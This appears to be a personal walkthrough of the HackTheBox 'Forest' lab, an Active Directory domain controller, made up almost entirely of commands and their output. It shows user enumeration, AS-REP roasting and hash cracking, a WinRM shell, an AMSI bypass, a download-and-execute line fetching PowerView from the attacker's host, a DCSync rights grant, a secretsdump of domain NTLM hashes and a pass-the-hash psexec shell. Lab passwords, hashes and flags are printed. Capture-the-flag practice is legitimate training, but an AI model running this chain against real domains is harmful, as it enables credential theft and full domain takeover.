HTB Forest done
Forest
OS:
Windows
Technology:
Active Directory
Kerberos
LDAP
IP Address:
10.10.10.161
Open ports:
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-09 05:08:32Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
Users and pass:
username: svc-alfresco
password: s3rvice
Administrator
sebastien
lucinda
andy
mark
santi
Nmap
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.161_nmap_vulns 10.10.10.161
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 01:01 EDT
Nmap scan report for 10.10.10.161
Host is up (0.037s latency).
Not shown: 65098 closed tcp ports (reset), 418 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-09 05:08:32Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-title: Not Found
Enum remote users
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
Enum remote groups
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
List all accounts in Domain Admins group
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ rpcclient -U "" -N 10.10.10.161
rpcclient $> querygroup 0x200
Group Name: Domain Admins
Description: Designated administrators of the domain
Group Attribute:7
Num Members:1
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name : Administrator
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Tue, 11 Apr 2023 06:21:56 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Mon, 30 Aug 2021 20:51:59 EDT
Password can change Time : Tue, 31 Aug 2021 20:51:59 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000010
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000061
padding1[0..7]...
logon_hrs[0..21]...
AS-REP Roasting
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ for user in $(cat users_list.txt); do /home/kali/.local/bin/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} 2>/dev/null; done
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for Administrator
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:857838d268b0ddcefb76056f19b9fb6c$78778fd9945a56cba0465e53cccba7de3814cdb40e098df8e55495f8314842ceb8ed6fdbbc3af7dbde83461fa7c1b392d0cdf552f081c0d701e81a938ea3216310354bd8347bd7bfcb6e91b000a67cd530a1d89f433b12c56a99c98d5a96c4a6788c1522aff8ebb3e7c241694f7e4261badd6069b1a6dbef6b2dd966194e0b184e4d863f638667e631b669f946715a13c2f650b9444fa3c4de3e7dd447f7d1d00ea9a6d05e31a780e808df1146351ab62e5c0636bfc0da24f486314541764fdc67f3076f70b421e10c0004e5cb9903454fcb9f32022347d59b682939021d20b5
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for andy
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for mark
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for santi
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
Crack Hash
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ cat svc-alfresco.hash
$krb5asrep$23$svc-alfresco@HTB:857838d268b0ddcefb76056f19b9fb6c$78778fd9945a56cba0465e53cccba7de3814cdb40e098df8e55495f8314842ceb8ed6fdbbc3af7dbde83461fa7c1b392d0cdf552f081c0d701e81a938ea3216310354bd8347bd7bfcb6e91b000a67cd530a1d89f433b12c56a99c98d5a96c4a6788c1522aff8ebb3e7c241694f7e4261badd6069b1a6dbef6b2dd966194e0b184e4d863f638667e631b669f946715a13c2f650b9444fa3c4de3e7dd447f7d1d00ea9a6d05e31a780e808df1146351ab62e5c0636bfc0da24f486314541764fdc67f3076f70b421e10c0004e5cb9903454fcb9f32022347d59b682939021d20b5
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ hashcat -m 18200 svc-alfresco.hash /usr/share/wordlists/rockyou.txt --show
$krb5asrep$23$svc-alfresco@HTB:857838d268b0ddcefb76056f19b9fb6c$78778fd9945a56cba0465e53cccba7de3814cdb40e098df8e55495f8314842ceb8ed6fdbbc3af7dbde83461fa7c1b392d0cdf552f081c0d701e81a938ea3216310354bd8347bd7bfcb6e91b000a67cd530a1d89f433b12c56a99c98d5a96c4a6788c1522aff8ebb3e7c241694f7e4261badd6069b1a6dbef6b2dd966194e0b184e4d863f638667e631b669f946715a13c2f650b9444fa3c4de3e7dd447f7d1d00ea9a6d05e31a780e808df1146351ab62e5c0636bfc0da24f486314541764fdc67f3076f70b421e10c0004e5cb9903454fcb9f32022347d59b682939021d20b5:s3rvice
Login with WinRM - svc-alfresco
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Read flag: user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2023 6:11 AM 800287 powerview.ps1
-ar--- 4/11/2023 3:21 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
479d51314663b6ff231f130cf59ae0cf
Privesc to Administrator
Dump domain info - Bloodhound
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (htb.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 34 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 12S
Run bloodhound
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ bloodhound
(node:790747) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:790814) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
Check what is a member of groups is user: svc-alfresco
Members of the Account Operators group are allowed create and modify users and add them to non-protected groups.
Click on Queries and select Shortest Path to High Value targets .
Create webserver and host PowerView.ps1
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ python2 -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.161 - - [14/Apr/2023 10:08:49] "GET /PowerView.ps1 HTTP/1.1" 200 -
Create a new user/group and download PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user john abc123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" john /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" john /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember
[+] Add-DomainObjectAcl
[+] Add-RemoteConnection
...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iex(new-object net.webclient).downloadstring('http://10.10.14.11/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'abc123!' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = new-object system.management.automation.pscredential('htb\john', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Dump NTLM hashes - secretsdump.py
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ /home/kali/.local/bin/secretsdump.py [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Read flag: root.txt
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Forest]
└─$ /usr/share/doc/python3-impacket/examples/psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ZRdaWwac.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service AbKx on 10.10.10.161.....
[*] Starting service AbKx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 02:15 PM <DIR> .
09/23/2019 02:15 PM <DIR> ..
04/14/2023 07:03 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,480,578,560 bytes free
C:\Users\Administrator\Desktop> type root.txt
cfa86b7b257ec9d8c5390e264b88f8c3